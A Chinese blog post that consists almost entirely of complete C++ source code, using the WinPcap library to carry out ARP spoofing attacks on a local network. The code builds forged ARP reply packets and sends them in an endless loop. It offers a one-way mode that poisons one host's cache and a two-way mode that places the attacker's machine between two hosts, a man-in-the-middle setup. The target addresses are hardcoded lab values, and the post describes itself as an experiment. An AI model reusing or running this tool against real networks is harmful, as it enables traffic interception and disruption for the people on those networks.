本文档展示了如何使用Winpcap库编写C++代码来实施ARP欺骗,包括单向欺骗和双向欺骗。代码中定义了MAC地址、以太网头部和ARP头部结构,并通过填充这些结构发送伪造的ARP响应包,从而篡改目标主机的ARP缓存。实验过程中,程序会不断发送ARP欺骗包,导致目标主机将攻击机的MAC地址误认为其他主机的MAC地址。
使用winpcap实现ARP欺骗代码
实验过程见 winpcap实现ARP欺骗攻击实验过程
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#define _CRT_SECURE_NO_WARNINGS
#define HAVE_REMOTE
#define WIN32
#include <iostream>
#include "pcap.h"
#pragma comment(lib,"wpcap")
using namespace std;
//对齐
#pragma pack (1)
//MAC地址
struct mac_address {
u_char byte[6];
};
struct eth_head {
mac_address destMAC; //目的MAC地址 6字节
mac_address sourceMAC; //源MAC地址 6字节
u_short type; //帧类型, 0x0806是ARP帧的类型值
};
struct arp_head
{
unsigned short hardwareType; //硬件类型
unsigned short protocolType; //协议类型
unsigned char hardwareAddLen; //硬件地址长度
unsigned char protocolAddLen; //协议地址长度
unsigned short op; //op,操作类型
mac_address sourceMAC; //发送方MAC地址
unsigned long sourceIP; //发送方IP地址
mac_address destMAC; //目的MAC地址
unsigned long destIP; //目的IP地址
};
struct arp_packet
{
eth_head apt_eth_head;
arp_head apt_arp_head;
};
#pragma pack ()
//单向欺骗
int mod1(pcap_t* adhandle)
{
//伪造ARP Relpy包
//目标信息
string DstIP = "192.168.243.80";
u_char DstMAC[6] = { 0x00,0x0C,0x29,0xB0,0xD7,0x94 };
//源信息
string SrcIP = "192.168.243.33";
u_char SrcMAC[6] = { 0x7C,0xB2,0x7D,0xD4,0xE9,0xDC }; //假MAC地址(攻击机MAC)
eth_head eh; //以太网头
arp_head ah; //ARP头
for (int i = 0; i < 6; i++)
eh.destMAC.byte[i] = DstMAC[i];
for (int i = 0; i < 6; i++)
eh.sourceMAC.byte[i] = SrcMAC[i];
eh.type = htons(0x0806); //ARP类型
ah.hardwareType = htons(0x0001);
ah.protocolType = htons(0x0800);
ah.hardwareAddLen = 0x06;
ah.protocolAddLen = 0x04;
ah.op = htons(0x0002);
ah.sourceMAC = eh.sourceMAC;
ah.sourceIP = inet_addr(SrcIP.c_str());
ah.destMAC = eh.destMAC;
ah.destIP = inet_addr(DstIP.c_str());
arp_packet* apt = NULL;
unsigned char sendbuffer[80];
memset(sendbuffer, 0, sizeof(sendbuffer));
apt = (arp_packet*)sendbuffer;
apt->apt_eth_head = eh;
apt->apt_arp_head = ah;
while (true)
{
if (pcap_sendpacket(adhandle, sendbuffer, sizeof(sendbuffer)) != 0)
{
cout << "packets send ERROR!" << endl;
return -1;
}
cout << "SEND SUCCESS" << endl;
Sleep(100);
}
return 0;
}
//双向欺骗
int mod2(pcap_t* adhandle)
{
//主机A
string A_IP = "192.168.243.80";
u_char A_MAC[6] = { 0x00,0x0C,0x29,0xB0,0xD7,0x94 };
//主机B
string B_IP = "192.168.243.53";
u_char B_MAC[6] = { 0x00,0x0C,0x29,0x64,0x03,0x99 };
//攻击机C
string C_IP = "";
u_char C_MAC[6] = { 0x7C,0xB2,0x7D,0xD4,0xE9,0xDC };
//发送给A的包
eth_head eh_A; //以太网头
arp_head ah_A; //ARP头
for (int i = 0; i < 6; i++)
eh_A.destMAC.byte[i] = A_MAC[i];
for (int i = 0; i < 6; i++)
eh_A.sourceMAC.byte[i] = C_MAC[i];
eh_A.type = htons(0x0806); //ARP类型
ah_A.hardwareType = htons(0x0001);
ah_A.protocolType = htons(0x0800);
ah_A.hardwareAddLen = 0x06;
ah_A.protocolAddLen = 0x04;
ah_A.op = htons(0x0002);
ah_A.sourceMAC = eh_A.sourceMAC;
ah_A.sourceIP = inet_addr(B_IP.c_str());
ah_A.destMAC = eh_A.destMAC;
ah_A.destIP = inet_addr(A_IP.c_str());
//发送给B的包
eth_head eh_B; //以太网头
arp_head ah_B; //ARP头
for (int i = 0; i < 6; i++)
eh_B.destMAC.byte[i] = B_MAC[i];
for (int i = 0; i < 6; i++)
eh_B.sourceMAC.byte[i] = C_MAC[i];
eh_B.type = htons(0x0806); //ARP类型
ah_B.hardwareType = htons(0x0001);
ah_B.protocolType = htons(0x0800);
ah_B.hardwareAddLen = 0x06;
ah_B.protocolAddLen = 0x04;
ah_B.op = htons(0x0002);
ah_B.sourceMAC = eh_B.sourceMAC;
ah_B.sourceIP = inet_addr(A_IP.c_str());
ah_B.destMAC = eh_B.destMAC;
ah_B.destIP = inet_addr(B_IP.c_str());
arp_packet* apt_A = NULL;
unsigned char sendbuffer_A[80];
memset(sendbuffer_A, 0, sizeof(sendbuffer_A));
apt_A = (arp_packet*)sendbuffer_A;
apt_A->apt_eth_head = eh_A;
apt_A->apt_arp_head = ah_A;
arp_packet* apt_B = NULL;
unsigned char sendbuffer_B[80];
memset(sendbuffer_B, 0, sizeof(sendbuffer_B));
apt_B = (arp_packet*)sendbuffer_B;
apt_B->apt_eth_head = eh_B;
apt_B->apt_arp_head = ah_B;
while (true)
{
if (pcap_sendpacket(adhandle, sendbuffer_A, sizeof(sendbuffer_A)) != 0)
{
cout << "packets send ERROR! A" << endl;
return -1;
}
if (pcap_sendpacket(adhandle, sendbuffer_B, sizeof(sendbuffer_B)) != 0)
{
cout << "packets send ERROR! B" << endl;
return -1;
}
cout << "SEND SUCCESS" << endl;
Sleep(100);
}
return 0;
}
int main()
{
pcap_if_t* alldevs;
pcap_if_t* d;
char errbuf[PCAP_ERRBUF_SIZE];
//获取设备列表
if (pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL, &alldevs, errbuf) == -1)
{
cout << "Error in pacp_findalldevs_ex:" << errbuf << endl;
return -1;
}
int i = 0;
for (d = alldevs; d != NULL; d = d->next)
{
cout << endl;
cout << i++ << " " << d->name << endl;
if (d->description)
cout << " <" << d->description << ">" << endl;
else
cout << " <No description>" << endl;
}
if (i == 0)
{
cout << "No interfaces found!" << endl;
return -1;
}
while (true)
{
int n;
cout << "\nchose interface:";
cin >> n;
if (n == -1)
{
pcap_freealldevs(alldevs);
return 0;
}
if (n < 0 || n >= i)
continue;
for (d = alldevs, i = 0; i < n; d = d->next, i++);
cout << n << " " << d->name << endl;
if (d->description)
cout << " <" << d->description << ">" << endl;
else
cout << " <No description>" << endl;
break;
}
//打开与网络适配器绑定的设备
pcap_t* adhandle;
if ((adhandle = pcap_open(d->name, 65535, PCAP_OPENFLAG_PROMISCUOUS, 1000, NULL, errbuf)) == NULL)
{
cout << "ERROR in open" << endl;
pcap_freealldevs(alldevs);
return -1;
}
pcap_freealldevs(alldevs);
//单向还是双向欺骗
//mod1(adhandle);
mod2(adhandle);
return 0;
}
7606
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
